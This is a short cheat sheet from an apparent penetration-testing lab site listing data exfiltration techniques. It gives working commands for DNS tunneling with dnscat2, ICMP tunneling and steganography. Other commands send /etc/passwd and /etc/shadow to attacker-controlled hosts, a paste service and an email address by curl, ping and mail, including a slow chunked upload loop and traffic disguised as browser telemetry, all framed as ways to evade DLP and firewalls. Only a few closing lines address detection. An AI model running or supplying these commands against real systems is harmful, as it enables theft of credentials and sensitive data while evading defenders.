⚠️ Pracivo Security Lab — Post-exploitation techniques for authorized penetration testing. Persistence, exfiltration, pivoting, LOLBins, C2 frameworks.
> Data Exfiltration Techniques
EXFILTRATION
# Goal: get data out without triggering DLP or firewall rules
# 1. DNS Tunneling (bypasses most firewalls — DNS is always allowed)
# Encode data in DNS queries:
# STOLEN_DATA_BASE64.attacker-dns.com
# Tool: iodine, dnscat2
dnscat2-server attacker.com # on attacker machine
dnscat2 attacker.com # on victim
# 2. HTTPS to trusted service (bypasses most DLP)
# Upload to Google Drive, Dropbox, Pastebin via API
curl -X POST "https://api.paste.ee/v1/pastes" -H "X-Auth-Token: API_KEY" -d "@/etc/passwd"
# 3. ICMP tunneling
ping -p $(cat /etc/passwd | xxd -p | head -c 32) attacker.com
# 4. Steganography (hide data in images)
steghide embed -cf photo.jpg -ef secrets.txt -p password
# Upload photo to social media — extract later
# 5. Email (if SMTP is open)
echo "$(cat /etc/shadow)" | mail -s "Report" attacker@gmail.com
# 6. Slow exfiltration (evade anomaly detection)
# Send 1KB/hour instead of 100MB at once
split -b 1024 sensitive_file.txt /tmp/chunk_
for chunk in /tmp/chunk_*; do
curl -s -F "data=@$chunk" https://attacker.com/upload
sleep 3600 # 1 hour between chunks
done
# 7. HTTP POST to look like legitimate traffic
# Encode in base64, POST to legitimate-looking URL
curl -X POST https://attacker.com/api/telemetry -H "User-Agent: Mozilla/5.0 (Windows NT 10.0)" -d "telemetry=$(cat /etc/passwd | base64)"
# DETECTION:
# Look for: unusual DNS query lengths, frequent DNS queries to new domains
# Large HTTPS uploads to unexpected destinations
# Anomalous data volume at unusual hours